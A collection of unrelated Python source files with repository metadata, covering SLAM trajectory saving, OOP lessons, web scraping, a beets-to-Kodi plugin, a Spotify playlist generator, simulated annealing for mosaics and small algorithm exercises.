#!/usr/bin/python3 import argparse import orbslam2 import os import cv2 from time import sleep def build_parser(): parser = argparse.ArgumentParser() parser.add_argument('--vocab', type=str, required=True) parser.add_argument('--config', type=str, required=True) parser.add_argument('--seq', type=str, required=True) return parser def main(args): sequence = [] with open(os.path.join(args.seq, 'rgb_left.txt'), 'r') as f_left, open(os.path.join(args.seq, 'rgb_right.txt'), 'r') as f_right: for line_left, line_right in zip(f_left, f_right): line_left, line_right = line_left.strip(), line_right.strip() if line_left.startswith('#'): continue ts, img_left_path = line_left.split() _, img_right_path = line_right.split() sequence.append((float(ts), os.path.join(args.seq, img_left_path), os.path.join(args.seq, img_right_path))) slam = orbslam2.System(args.vocab, args.config, orbslam2.Sensor.STEREO) slam.set_use_viewer(True) slam.initialize() for ts, path_left, path_right in sequence: img_left = cv2.imread(path_left) img_right = cv2.imread(path_right) slam.process_image_stereo(img_left, img_right, ts) sleep(0.1) save_trajectory(slam.get_trajectory_points(), 'trajectory.txt') slam.shutdown() def save_trajectory(trajectory, filename): with open(filename, 'w') as traj_file: traj_file.writelines('{time} {r00} {r01} {r02} {t0} {r10} {r11} {r12} {t1} {r20} {r21} {r22} {t2}\n'.format( time=repr(t), r00=repr(r00), r01=repr(r01), r02=repr(r02), t0=repr(t0), r10=repr(r10), r11=repr(r11), r12=repr(r12), t1=repr(t1), r20=repr(r20), r21=repr(r21), r22=repr(r22), t2=repr(t2) ) for t, r00, r01, r02, t0, r10, r11, r12, t1, r20, r21, r22, t2 in trajectory) if __name__ == '__main__': parser = build_parser() args = parser.parse_args() main(args)
cds-mipt/iprofihack
baselines/orbslam2/scripts/run_orbslam2_stereo.py
run_orbslam2_stereo.py
py
2,114
python
en
code
3
github-code
36
541220899
# Реализация класса class People: # Инициализируем человека def __init__(self, name="", surname="", age=0, gender="male"): self.name = name self.surname = surname self.age = age self.gender = gender def print_info(self): # Прописываем информацию о человеке print("Class: People\nName={}\nSurname={}" "\nAge={}\nGender={}".format(self.name, self.surname, self.age, self.gender)) class Student(People): # Инициализация студента def __init__(self, name="", surname="", age=0, gender="male", group="no-group"): super().__init__(name=name, surname=surname, age=age, gender=gender) self.group = group print("Init!") def print_info(self): print("Class: Student\nName={}\nSurname={}" "\nAge={}\nGender={}\nGroup={}".format(self.name, self.surname, self.age, self.gender, self.group)) # Обращаемся к методам и свойствам этого объекта new_student = Student(name="Petr", surname="Petrenko", age=19, gender="male", group="ITN-41") old_student = Student(name="Karina", surname="Borisova", age=20, gender="female", group="ITN-42") new_student.print_info() old_student.print_info() print(new_student.name) print(new_student.group) class Employee(People): def __init__(self, name="", surname="", age=0, gender="male", post="specialist"): super().__init__(name=name, surname=surname, age=age, gender=gender) self.post = post def print_info(self): print("Class: People\nName={}\nSurname={}" "\nAge={}\nGender={}\nPost={}".format(self.name, self.surname, self.age, self.gender, self.post)) # Интерфейсы class InformalParserInterface: def load_data_source(self, path, file_name): # Загрузка данных raise NotImplementedError def extract_text(self, full_file_name): # Вывод данных raise NotImplementedError class Test: public_attribute = 42 __private_attribute = [1, 2 ,3] print(Test.public_attribute) print(Test.__private_attribute)
FRFGreyFox/artificial_intelligence
Lectors/OOP.py
OOP.py
py
2,807
python
en
code
1
github-code
36
11316424779
import json import re from pprint import pprint with open('yc_feed.json') as data_file: data = json.load(data_file) i = 0 c = 0 for hundredmessages in data: hm_plain_text = json.dumps(hundredmessages) match = re.search(r'hackathon', hm_plain_text) if match: for msg in hundredmessages['data']: msg_plain_text = json.dumps(msg) match = re.search(r'hackathon', msg_plain_text) if match: c = c + 1 print('---') print(c) print(i) print(msg['updated_time']) print('###') i = i + 1
adamhipster/hackathon_website
python_fb_group_crawls/parse_fb_feed_data.py
parse_fb_feed_data.py
py
530
python
en
code
0
github-code
36
38895942898
from sys import argv, exit from pygmail.types import Account, Label if __name__ == "__main__": account = Account.from_environment(load_labels=True) label_file = argv[1] if not label_file: print("Usage: remove_labels.py <input_file>") exit(1) label_names = None with open(argv[1]) as fh: label_names = fh.readlines() if not label_names: print("Label file is empty!") exit(1) for label_name in label_names: label = account.get_label_by_name(label_name.strip()) if not label: print(f"Couldn't locate label {label_name} to delete") continue print(f"Deleting label, name={label.name()}, ID={label.label_id()}") try: result = Label.delete(account, label.label_id()) print(result) except Exception as e: print(e)
sk3l/pygmail
examples/remove_labels.py
remove_labels.py
py
881
python
en
code
0
github-code
36
27769169402
import scrapy from scrapy.linkextractors import LinkExtractor from scrapy.spiders import CrawlSpider, Rule class XyjjSpider(CrawlSpider): name = 'xyjj' # allowed_domains = ['www.ccc.com'] start_urls = ['https://www.xyshjj.cn/list-1487-1489-0.html'] # page链接与其他链接相似度过高 rules不起作用,放弃。 rules = ( Rule(LinkExtractor(allow=r'">\d+</a>'), callback='parse_item', follow=True), ) def parse_item(self, response): item = {} #item['domain_id'] = response.xpath('//input[@id="sid"]/@value').get() #item['name'] = response.xpath('//div[@id="name"]').get() #item['description'] = response.xpath('//div[@id="description"]').get() ls = response.xpath('.//div[@class="article-list"]/div') print('---------') for i in ls: url = i.xpath('./div/a/@href').get() num = i.xpath('./div/a/text()').get() print(url,' - ',num) return item
kshsky/PycharmProjects
dataFile/scrapy/ace/xxjjCrawl/xxjjCrawl/spiders/xyjj.py
xyjj.py
py
992
python
en
code
0
github-code
36
28068050082
# 보물섬 # https://www.acmicpc.net/problem/2589 from collections import deque import copy def bfs(treasure_map, x, y, n, m) : copy_map = copy.deepcopy(treasure_map) dx = [-1, 1, 0, 0] dy = [0, 0, -1, 1] # 시작 지점과 탐색해나가는 지점과의 거리 저장 변수 count = 0 queue = deque([[x, y, count]]) copy_map[x][y] = 'W' # 시작 지점은 거쳐갔다는 표시 while queue : x, y, cnt = queue.popleft() count = cnt # 다음 지점의 좌표를 꺼낼 때마다 거리를 갱신한다. for i in range(4) : nx = x + dx[i] ny = y + dy[i] if nx < 0 or nx >= n or ny < 0 or ny >= m : continue if copy_map[nx][ny] == 'L' : copy_map[nx][ny] = 'W' queue.append([nx, ny, cnt + 1]) return count def solution() : n, m = map(int, input().split()) treasure_map = [] count_list = [] for _ in range(n) : temp = list(input()) treasure_map.append(temp) # 완전 탐색 for i in range(n) : for j in range(m) : if treasure_map[i][j] == 'L' : count_list.append(bfs(treasure_map, i, j, n, m)) print(max(count_list)) solution()
hwanginbeom/algorithm_study
1.algorithm_question/6.BFS/131.BFS_wooseok.py
131.BFS_wooseok.py
py
1,279
python
ko
code
3
github-code
36
74627444265
def solution(array): print(array[-1]) if array == []: return 1 else: if len(array) < 3: return array[0] - 1 else: array.sort() for i in range(0, len(array) - 1): if array[0] > 1: return 1 elif array[-1] != len(array) + 1: return len(array) + 1 else: if (array[i] + 1 != array[i+1]): return array[i] + 1
diegosadrinas/Code-Tests
Codility/PermMissingElem/PermMissingElem.py
PermMissingElem.py
py
407
python
en
code
1
github-code
36
14247830669
""" Author: Todd Zenger, Brandeis University The purpose of this program is to show some basics of functions. """ """ First, we can put something in, and get a value out NOTICE: you are responsible to figure out what data type you are passing into the function and what type you are spitting out """ def f(x): y = 3*x + 2 return y # To get this value, we define it like any other variable g = f(4) # g is now equal to 14 """ Passing in variables is fine as well. It doesn't matter if we used x as an argument for the funciton. """ x = 2 h = f(x) # h is now equal to 8 """ Now, we can have the function give out multiple values. """ def funcs(x): y = 3*x - 2 z = 3*(x**2) - 2*x # Each value we want to return, we seperate with a comma return y, z """ There are two ways to extract a value from a function: 1) Either we define a new variable for each return value We can then use each one as a variable like we normally do """ j, k = funcs(4) # j is 10 and k is 40 """ 2) We can define a single variable that will hold all return values. It will then become a tuple, which is like a list that we cannot modify. Then to get each value, we just index like we would for a list that has the size of the number of return values we have """ n = funcs(3) """ Here, n is (7,21) So, n[0] is 7 and n[1] is 21 """ """ Next, we can pass in multiple values for the function to process """ def mulfunc(x, y, message): print(message) #We are allowed to do other operations like normal return (x+3*y) # We don't have to create a variable just to return d = mulfunc(2, 4, "Hello!") # d is 14 """ Final thing (at least for now) about functions, all the arguments we pass in don't always have to be set everytime. We can make a default value and choose whenever we want to set them """ def fixedfunc(x, y, mu=25, chi=3): return x*y - mu**chi """ First, we keep all default values """ q = fixedfunc(2, 5) # q is -15615 """ We can change the default values as well """ e = fixedfunc(4, 6, mu=5, chi=2) # e is -1 """ Or some of the default values as well """ i = fixedfunc(1, 9, mu=2) # i is 1
ToddZenger/PHYS19a
tutorial/lesson01/functions.py
functions.py
py
2,132
python
en
code
1
github-code
36
34848625388
from __future__ import absolute_import from __future__ import unicode_literals __version__ = '0.5.0' from markdown import Extension from markdown.treeprocessors import Treeprocessor class MDXReplaceImageSrcTreeprocessor(Treeprocessor): def __init__(self, md, config): super(MDXReplaceImageSrcTreeprocessor, self).__init__(md) self.config = config def run(self, root): imgs = root.iter("img") for image in imgs: image.set("src", self.find_replace(image.attrib["src"])) def find_replace(self, path): return path.replace(self.config["find"], self.config["replace"]) class MDXReplaceImageSrcExtension(Extension): def __init__(self, *args, **kwargs): self.config = { 'find' : ["", "the string to find"], 'replace': ["", "the string to replace"], } super(MDXReplaceImageSrcExtension, self).__init__(*args, **kwargs) def extendMarkdown(self, md, md_globals): ReplaceImageSrc = MDXReplaceImageSrcTreeprocessor(md, self.getConfigs()) md.treeprocessors.add( "ReplaceImageSrc", ReplaceImageSrc, "_end" ) md.registerExtension(self) def makeExtension(*args, **kwargs): return MDXReplaceImageSrcExtension(*args, **kwargs)
twardoch/markdown-steroids
mdx_steroids/replimgsrc.py
replimgsrc.py
py
1,313
python
en
code
3
github-code
36
40272343197
from __future__ import absolute_import, division, print_function import base64 import json import os import time import requests import urllib.request from urllib.request import Request, urlopen from uuid import UUID from beets import config import beets.library from beets.plugins import BeetsPlugin from pathlib import Path from lxml import etree as et import simplejson audio_db_key = '195010' artist_tags = ['name', 'musicBrainzArtistID', 'sortname', 'genre', 'style', 'mood', 'born', 'formed', 'biography', 'died', 'disbanded'] album_tags = ['title', 'musicBrainzAlbumID', 'artist', 'genre', 'style', 'mood', 'theme', 'compilation', 'review', 'type', 'releasedate', 'label', 'rating', 'year'] emptyalbum = '''{"album":[{"idAlbum":"","idArtist":"","idLabel":"", "strAlbum":"","strAlbumStripped":"","strArtist":"", "intYearReleased":"","strStyle":"","strGenre":"","strLabel":"", "strReleaseFormat":"","intSales":"","strAlbumThumb":"", "strAlbumThumbBack":"","strAlbumCDart":"","strAlbumSpine":"", "strDescriptionEN":"","strDescriptionDE":"", "strDescriptionFR":"","strDescriptionCN":"", "strDescriptionIT":"","strDescriptionJP":"", "strDescriptionRU":"","strDescriptionES":"", "strDescriptionPT":"","strDescriptionSE":"", "strDescriptionNL":"","strDescriptionHU":"", "strDescriptionNO":"","strDescriptionIL":"", "strDescriptionPL":"", "intLoved":"","intScore":"","intScoreVotes":"","strReview":" ", "strMood":"","strTheme":"","strSpeed":"","strLocation":"", "strMusicBrainzID":"","strMusicBrainzArtistID":"", "strItunesID":"","strAmazonID":"","strLocked":""}]}''' emptyartist = '''{"artists":[{"idArtist":"","strArtist":"", "strArtistAlternate":"","strLabel":"","idLabel":"", "intFormedYear":"","intBornYear":"","intDiedYear":"", "strDisbanded":"","strStyle":"","strGenre":"","strMood":"", "strWebsite":"","strFacebook":"","strTwitter":"", "strBiographyEN":"","strBiographyDE":"","strBiographyFR":"", "strBiographyCN":"","strBiographyIT":"","strBiographyJP":"", "strBiographyRU":"","strBiographyES":"","strBiographyPT":"", "strBiographySE":"","strBiographyNL":"","strBiographyHU":"", "strBiographyNO":"","strBiographyIL":"","strBiographyPL":"", "strGender":"","intMembers":"","strCountry":"", "strCountryCode":"","strArtistThumb":"","strArtistLogo":"", "strArtistFanart":"","strArtistFanart2":"", "strArtistFanart3":"","strArtistBanner":"", "strMusicBrainzID":"","strLastFMChart":"","strLocked":""}]}''' audiodb_url = "http://www.theaudiodb.com/api/v1/json/" libpath = os.path.expanduser(str(config['library'])) lib = beets.library.Library(libpath) LINK_ALBUM = 'https://musicbrainz.org/release/{0}' LINK_ARTIST = 'https://musicbrainz.org/artist/{0}' LINK_TRACK = 'https://musicbrainz.org/recording/{0}' def artist_info(albumid): """Collect artist information from beets lib and audiodb.com.""" for album in lib.albums(albumid): data = (album.albumartist, album.albumartist_sort, album.mb_albumartistid, album.genre, album.path) url = audiodb_url + "{0}/artist-mb.php?i=".format( audio_db_key) try: response = urllib.request.urlopen(url + data[2]) data2 = simplejson.load(response)["artists"][0] except (ValueError, TypeError): # catch simplejson.decoder.JSONDecodeError and load emptydata data2 = json.loads(emptyartist)["artists"][0] out_data = ( "{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12}".format( data[0], data[2], data[1], data[3], data2["strStyle"] or '', data2["strMood"] or '', data2["intBornYear"] or '', data2["intFormedYear"] or '', data2["strBiographyEN"] or '', data2["intDiedYear"] or '', data2["strDisbanded"] or '', data2["strArtistThumb"] or '', data2["strArtistFanart"] or '')) return list(out_data.split(';')) def artist_albums(artistid): """Get artist's albums from beets library.""" albumdata = [] for album in lib.albums(artistid): row = album.album, album.original_year albumdata.append(list(tuple([row[1], row[0]]))) # create sortable list # sort list to start with first release/album albumlist = (sorted(albumdata)) return albumlist def album_info(albumid): """Collect album information from beets lib and audiodb.com.""" for album in lib.albums(albumid): data = ( album.albumartist, album.mb_albumartistid, album.mb_releasegroupid, album.album, album.genre, album.comp, album.label, album.albumtype, album.mb_albumid) date = album.original_year, album.original_month, album.original_day rel_date = ( "%s-%s-%s" % (date[0], format( date[1], '02'), format( date[2], '02'))) url = audiodb_url + "{0}/album-mb.php?i=".format( config['audiodb']['key']) if data[5] == 0: comp = 'False' else: comp = 'True' try: response = urllib.request.urlopen(url + data[2]) data2 = simplejson.load(response)["album"][0] except (ValueError, TypeError): # catch simplejson.decoder.JSONDecodeError and load emptydata data2 = json.loads(emptyalbum)["album"][0] out_data = ("{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12};" "{13};{14}".format((data[3]), (data[8]), (data[0]), (data[4]), (data2["strStyle"]) or '', (data2["strMood"]) or '', (data2["strTheme"]) or '', (comp), (data2["strReview"]) or '', (data[7]), (rel_date), (data[6]), (data2["intScore"]) or '', (date[0]), (data2["strAlbumThumb"]) or '')) return list(out_data.split(';')) def album_tracks(albumid): """Get album's tracks from beets libary.""" trackdata = [] for item in lib.items(albumid): row = item.track, item.mb_trackid, item.length, item.title duration = time.strftime("%M:%S", time.gmtime(row[2])) trackdata.append(list(tuple([row[0], duration, row[1], row[3]]))) tracklist = (sorted(trackdata)) # sort list by track number return tracklist def kodi_path(): """From kodi itself get the music library path.""" """Useful for shared libraries, in order to get nfs or samba paths.""" try: auth = str.encode( '%s:%s' % (config['kodi']['user'], config['kodi']['pwd'])) authorization = b'Basic ' + base64.b64encode(auth) headers = { 'Content-Type': 'application/json', 'Authorization': authorization} url = "http://{0}:{1}/jsonrpc".format( config['kodi']['host'], config['kodi']['port']) music_lib_name = "{0}".format(config['kodi']['library_name']) data = {"jsonrpc": "2.0", "method": "Files.GetSources", "params": {"media": music_lib_name}, "id": 1} json_data = json.dumps(data).encode('utf-8') request = Request(url, json_data, headers) result = simplejson.load(urlopen(request)) _kodi_path = result['result']['sources'][0]['file'] return _kodi_path except (requests.exceptions.RequestException, ValueError, TypeError): return '' def album_path(albumid): """Get album path.""" out_data = [] for album in lib.albums(albumid): album_path = album.path.decode("utf-8") root = str(config["directory"]) length = int(len(root) + 1) kodi_lib_path = kodi_path() + album_path[length:] out_data = album_path, kodi_lib_path return out_data def artist_path(albumid): """Get artist path.""" out_data = [] root = str(config['directory']) for album in lib.albums(albumid): albumpath = album.path.decode("utf-8") albumartist = album.albumartist if albumartist == os.path.basename(os.path.dirname(albumpath)): artist_path = os.path.dirname(albumpath) kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):] else: folder = os.path.join(root, str(config['paths']['default'])) config_items = Path(folder).parts folder_length = len(config_items) indices = [i for i, s in enumerate(config_items) if 'albumartist' in s] y = int(folder_length - indices[0]) artistpath_items = list(Path(albumpath).parts[-y:-1]) artist_path = os.path.join(root, *artistpath_items) kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):] out_data = artist_path, kodi_lib_path return out_data def thumbs(tag, albumid): """Name paths where art files reside.""" if "artist" in tag: thumbs = [] for a in artist_path(albumid): thumb = os.path.join(a, 'artist.tbn') thumbs.append(thumb) return thumbs if "album" in tag: for album in lib.albums(albumid): if album.artpath: art_file = os.path.basename(album.artpath.decode('utf8')) thumbs = [] for a in album_path(albumid): thumb = os.path.join(a, art_file) thumbs.append(thumb) return thumbs def album_nfo_text(albumid, mb_albumid, mb_artistid): """Create MBID URL only text file.""" album_nfo_file = os.path.join(album_path(albumid)[0], 'album.nfo') with open(album_nfo_file, 'w') as f: f.write(LINK_ALBUM.format(mb_albumid)) if os.path.basename(artist_path(albumid)[0]) in ['Various Artists', 'Soundtracks', 'Compilations']: pass # No artist.nfo file for compilation albums else: artist_nfo_file = os.path.join(artist_path(albumid)[0], 'artsist.nfo') with open(artist_nfo_file, 'w') as f: f.write(LINK_ARTIST.format(mb_artistid)) def album_nfo_xml(albumid): """Create XML file with album information.""" for album in lib.albums(albumid): albumnfo = os.path.join(album.path.decode('utf8'), 'album.nfo') albumid = 'mb_albumid:' + album.mb_albumid root = et.Element('album') for i in range(len(album_tags)): album_tags[i] = et.SubElement(root, '{}'.format(album_tags[i])) album_tags[i].text = album_info(albumid)[i] for i in range(len(album_path(albumid))): path = et.SubElement(root, 'path') path.text = album_path(albumid)[i] if album_info(albumid)[14] == '': for i in range(len(thumbs('album', albumid))): thumb = et.SubElement(root, 'thumb') thumb.text = thumbs('album', albumid)[i] else: thumb = et.SubElement(root, 'thumb') thumb.text = album_info(albumid)[14] for i in range(len(thumbs('album', albumid))): thumb = et.SubElement(root, 'thumb') thumb.text = thumbs('album', albumid)[i] albumartistcredits = et.SubElement(root, 'albumArtistCredits') artist = et.SubElement(albumartistcredits, 'artist') artist.text = album.albumartist musicbrainzartistid = et.SubElement( albumartistcredits, 'musicBrainzArtistID') musicbrainzartistid.text = album.mb_albumartistid for i in range(len(album_tracks(albumid))): track = et.SubElement(root, 'track') position = et.SubElement(track, 'position') position.text = str(album_tracks(albumid)[i][0]) title = et.SubElement(track, 'title') title.text = album_tracks(albumid)[i][3] duration = et.SubElement(track, 'duration') duration.text = album_tracks(albumid)[i][1] musicbrainztrackid = et.SubElement(track, 'musicBrainzTrackID') musicbrainztrackid.text = album_tracks(albumid)[i][2] xml = et.tostring( root, pretty_print=True, xml_declaration=True, encoding='UTF-8', standalone="yes").decode() print(xml, file=open(albumnfo, 'w+')) def artist_nfo_xml(albumid): """Create XML file with artist information.""" for album in lib.albums(albumid): albumid = 'mb_albumid:' + album.mb_albumid artistid = 'mb_albumartistid:' + album.mb_albumartistid artistnfo = os.path.join( album.path.decode('utf8'), os.pardir, 'artist.nfo') if album.albumartist in ['Various Artists', 'Soundtracks', 'Compilations']: pass else: root = et.Element('artist') for i in range(len(artist_tags)): artist_tags[i] = et.SubElement( root, '{}'.format(artist_tags[i])) artist_tags[i].text = artist_info(albumid)[i] for i in range(len(artist_path(albumid))): path = et.SubElement(root, 'path') path.text = artist_path(albumid)[i] if artist_info(albumid)[11] == '': thumb = et.SubElement(root, 'thumb') thumb.text = '' else: thumb_location = os.path.join( album.path.decode('utf8'), os.pardir, 'artist.tbn') urllib.request.urlretrieve( artist_info(albumid)[11], thumb_location) thumb = et.SubElement(root, 'thumb') thumb.text = artist_info(albumid)[11] for i in range(len(thumbs('artist', albumid))): thumb = et.SubElement(root, 'thumb') thumb.text = thumbs('artist', albumid)[i] fanart = et.SubElement(root, 'fanart') fanart.text = artist_info(albumid)[12] for i in range(len(artist_albums(artistid))): album = et.SubElement(root, 'album') title = et.SubElement(album, 'title') title.text = artist_albums(artistid)[i][1] year = et.SubElement(album, 'year') year.text = str(artist_albums(artistid)[i][0]) xml = et.tostring( root, pretty_print=True, xml_declaration=True, encoding='UTF-8', standalone="yes").decode() print(xml, file=open(artistnfo, 'w+')) def update_kodi(host, port, user, password): """Send request to the Kodi api to start a library refresh.""" """By Pauli Kettunen""" url = "http://{0}:{1}/jsonrpc/".format(host, port) """Content-Type: application/json is mandatory""" """according to the kodi jsonrpc documentation""" headers = {'Content-Type': 'application/json'} # Create the payload. Id seems to be mandatory. payload = {'jsonrpc': '2.0', 'method': 'AudioLibrary.Scan', 'id': 1} r = requests.post( url, auth=(user, password), json=payload, headers=headers) return r class KodiNfo(BeetsPlugin): """KodiNfo Plugin.""" def __init__(self): """Plugin docstring.""" super(KodiNfo, self).__init__() # Adding defaults. self.config['audiodb'].add({ "key": 1}) config['kodi'].add({ u'host': u'localhost', u'port': 8080, u'user': u'kodi', u'pwd': u'kodi', u'nfo_format': 'xml', u'library_name': 'music'}) config['kodi']['pwd'].redact = True self.register_listener('album_imported', self.create_nfos) self.register_listener('database_change', self.listen_for_db_change) def create_nfos(self, lib, album): """Create nfos as per choice in config.""" try: # Check if MBID is valid UUID as per MB recommendations UUID(album.mb_albumid) self._log.info(u'Album ID is valid MBID...creating .nfos') albumid = 'mb_albumid:' + album.mb_albumid mb_albumid = album.mb_albumid mb_artistid = album.mb_albumartistid nfo_format = '{0}'.format(config['kodi']['nfo_format']) if nfo_format in 'mbid_only_text': self._log.info(u'Creating url only text format .nfo file...') album_nfo_text(albumid, mb_albumid, mb_artistid) else: self._log.info(u'creating XML format .nfo file...') album_nfo_xml(albumid) artist_nfo_xml(albumid) except ValueError: self._log.info(u"Album ID is not valid MBID...can't create .nfos") def listen_for_db_change(self, lib, model): """Listen for beets db change and register the update.""" self.register_listener('cli_exit', self.update) def update(self, lib): """When client exists try sending refresh request to Kodi server.""" self._log.info(u'Updating Kodi library...') # Try to send update request. try: update_kodi( config['kodi']['host'].get(), config['kodi']['port'].get(), config['kodi']['user'].get(), config['kodi']['pwd'].get()) self._log.info(u'... started.') except requests.exceptions.RequestException: self._log.warning(u'Update failed.')
peace899/beets2kodi
beetsplug/kodinfo.py
kodinfo.py
py
18,692
python
en
code
1
github-code
36
72582014823
import spotipy import openai import json import argparse import datetime from dotenv import load_dotenv import os load_dotenv() openai.api_key = os.environ.get("OPENAI_API_KEY") parser = argparse.ArgumentParser(description="Enkelt commandline verktøy") parser.add_argument("-p", type=str, default="AI genert liste",help="Prompten som beskriver playlisten") parser.add_argument("-n", type=int, default=10 ,help="Hvor mange sanger ønsker du i playlisten") args = parser.parse_args() def get_playlist(prompt, count=10): example_json = """ [ {"song": "Someone Like You", "artist": "Adele"}, {"song": "Hurt", "artist": "Johnny Cash"}, {"song": "Fix You", "artist": "Coldplay"}, {"song": "Nothing Compares 2 U", "artist": "Sinead O'Connor"}, {"song": "All By Myself", "artist": "Celine Dion"}, {"song": "Tears in Heaven", "artist": "Eric Clapton"}, {"song": "My Immortal", "artist": "Evanescence"}, {"song": "I Can't Make You Love Me", "artist": "Bonnie Raitt"}, {"song": "Everybody Hurts", "artist": "R.E.M."}, {"song": "Mad World", "artist": "Gary Jules"} ] """ messages = [ {"role": "system", "content": """You are a helpfull playlist generating assistant. You should generate a list of songs and their artists accordning to a text prompt. You should retur it as a json array, where each element follows this format: {"song": >song_title>, "artist": <artist_name>} """ }, {"role": "user", "content": """Generate a playlist of 10 songs based on this prompt: super super sad songs """ }, {"role": "assistant", "content": example_json }, {"role": "user", "content": f"Generate a playlist of {count} songs based on this prompt: {prompt}" }, ] response = openai.ChatCompletion.create( messages=messages, model="gpt-3.5-turbo", max_tokens=400, ) playlist = json.loads(response["choices"][0]["message"]["content"]) return (playlist) playlist = get_playlist(args.p, args.n) ## JSON format for artists and songs print(playlist) sp = spotipy.Spotify( auth_manager=spotipy.SpotifyOAuth( client_id=os.environ.get("SPOTIFY_CLIENT_ID"), client_secret=os.environ.get("SPOTIFY_CLIENT_SECRET"), redirect_uri="http://localhost:8888/", scope="playlist-modify-private" ) ) current_user = sp.current_user() track_ids = [] assert current_user is not None for item in playlist: artist, song = item["artist"], item["song"] query = f"{song} {artist}" search_results = sp.search(q=query, type="track", limit=10) track_ids.append(search_results["tracks"]["items"][0]["id"]) playlist_prompt = args.p created_playlist = sp.user_playlist_create( current_user["id"], public=False, name=f"{'AI - '} {playlist_prompt} {datetime.datetime.now().strftime('%c')}" ) sp.user_playlist_add_tracks( current_user["id"], created_playlist["id"], track_ids )
donadelicc/MySpotify
utils/local_app.py
local_app.py
py
3,072
python
en
code
0
github-code
36
40129073796
from openpydss.opendss.model.dssobject import DSSObject class Transformer(DSSObject): def __init__( self, phases="3", windings="2", wdg="1", bus="transformer_1", conn="wye ", kV="12.47", kVA="1000", tap="1", pct_R="0.2", Rneut="-1", Xneut="0", buses="[transformer_1, transformer_2, ]", conns="[wye, wye, ]", kVs="[12.47, 12.47, ]", kVAs="[1000, 1000, ]", taps="[1, 1, ]", XHL="7", XHT="35", XLT="30", Xscarray="[7, ]", thermal="2", n=".8", m=".8", flrise="65", hsrise="15", pct_loadloss="0.4", pct_noloadloss="0", normhkVA="1100", emerghkVA="1500", sub="n", MaxTap="1.1", MinTap="0.9", NumTaps="32", subname="", pct_imag="0", ppm_antifloat="1", pct_Rs="[0.2, 0.2, ]", bank="", XfmrCode="", XRConst="NO", X12="7", X13="35", X23="30", LeadLag="Lag", WdgCurrents="0, (0), 0, (0), 0, (0), 0, (0), 0, (0), 0, (0), ", Core="shell", RdcOhms="0.08811718", Seasons="1", Ratings="[1100,]", normamps="50.929", emergamps="69.449", faultrate="0.007", pctperm="100", repair="36", basefreq="60", enabled="true", like="", ): super().__init__() self.phases = phases self.windings = windings self.wdg = wdg self.bus = bus self.conn = conn self.kV = kV self.kVA = kVA self.tap = tap self.pct_R = pct_R self.Rneut = Rneut self.Xneut = Xneut self.buses = buses self.conns = conns self.kVs = kVs self.kVAs = kVAs self.taps = taps self.XHL = XHL self.XHT = XHT self.XLT = XLT self.Xscarray = Xscarray self.thermal = thermal self.n = n self.m = m self.flrise = flrise self.hsrise = hsrise self.pct_loadloss = pct_loadloss self.pct_noloadloss = pct_noloadloss self.normhkVA = normhkVA self.emerghkVA = emerghkVA self.sub = sub self.MaxTap = MaxTap self.MinTap = MinTap self.NumTaps = NumTaps self.subname = subname self.pct_imag = pct_imag self.ppm_antifloat = ppm_antifloat self.pct_Rs = pct_Rs self.bank = bank self.XfmrCode = XfmrCode self.XRConst = XRConst self.X12 = X12 self.X13 = X13 self.X23 = X23 self.LeadLag = LeadLag self.WdgCurrents = WdgCurrents self.Core = Core self.RdcOhms = RdcOhms self.Seasons = Seasons self.Ratings = Ratings self.normamps = normamps self.emergamps = emergamps self.faultrate = faultrate self.pctperm = pctperm self.repair = repair self.basefreq = basefreq self.enabled = enabled self.like = like
munizrodrigo/openpydss
openpydss/opendss/model/transformer.py
transformer.py
py
3,379
python
en
code
0
github-code
36
9104252011
##annealing.py # this python script bruteforces swaps until N iterations are reached. best is saved and shown from classes.bucket import Bucket from classes.target import Target from classes.generate import Generate from similarity import Similarity, Delta from random import random from math import exp def Annealing(targetpath, bucketpath, nrow, ncol, params = None ): t = 0 if params == None: TMAX = 50000000 #TMAX = 1000 beta = 0.0001 beta_incr = 1.000001 else: TMAX = params.TMAX beta = params.beta beta_incr = params.beta_incr A = Target(targetpath,nrow,ncol) x = Bucket(bucketpath, A.size) Smin = Similarity(A.matrix,x.vector, nrow, ncol) s = Smin xmin = x while t < TMAX : x.propose() indexes = (x.i1, x.i2) #for now this works only with nrow = ncol, easy to implement the more general tho deltas = Delta(A.matrix,x.vector, indexes, nrow, ncol) s1 = s+deltas if t%(TMAX/100)==0: print(str(int(t/TMAX*100))+r"% complete (beta= "+str(beta)+", deltas= "+str(deltas)+", smin= "+str(Smin)+")") # record best if s1 < Smin: xmin = x Smin = s1 # accept swap accept = False if s1 < s: accept = True # to avoid unnecessary exp calculations elif exp( - beta * deltas)> random(): accept = True if accept == True: s = s1 x.swap() t = t + 1 beta = beta*beta_incr return (A, xmin) if __name__ == "__main__": nrow = 33 ncol = 33 A = Target('/Users/saramilone/ricciobbello/mosaic-bot/images/targets/drow_portrait.jpeg',nrow,ncol) x = Bucket('/Users/saramilone/ricciobbello/mosaic-bot/images/drow_ranger_edit', A.size) Smin = Similarity(A.matrix,x.vector, nrow, ncol) s = Smin xmin = x t = 0 TMAX = 1000000000 #TMAX = 1000 beta = 0.00005 beta_incr = 1.00000001 while t < TMAX : x.propose() indexes = (x.i1, x.i2) #for now this works only with nrow = ncol, easy to implement the more general tho deltas = Delta(A.matrix,x.vector, indexes, nrow, ncol) s1 = s+deltas if t%(TMAX/100)==0: print(str(int(t/TMAX*100))+r"% complete (beta= "+str(beta)+", deltas= "+str(deltas)+", smin= "+str(Smin)+")") # record best if s1 < Smin: xmin = x Smin = s1 # accept swap accept = False if s1 < s: accept = True # to avoid unnecessary exp calculations elif exp( - beta * deltas)> random(): accept = True if accept == True: s = s1 x.swap() t = t + 1 beta = beta*beta_incr print(Smin) print(x.cap) g = Generate('/Users/saramilone/ricciobbello/mosaic-bot/images/out_nonorm.png',A,xmin) print("size x: "+str(g.size_x)) print("size y: "+str(g.size_y)) print(A.matrix) print(x.vector)
porcherface/mosaic-bot
code/annealing.py
annealing.py
py
2,675
python
en
code
0
github-code
36
40558916970
#!/usr/bin/python3 def roman_to_int(roman_string): if roman_string is None or isinstance(roman_string, str) is not True: return 0 dicta = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000} tot = 0 prev = 0 for let in roman_string: if let not in dicta: return 0 if dicta[let] > tot: tot = dicta[let] - tot elif dicta[let] > prev: tot = tot + dicta[let] - prev * 2 else: tot = dicta[let] + tot prev = dicta[let] return tot
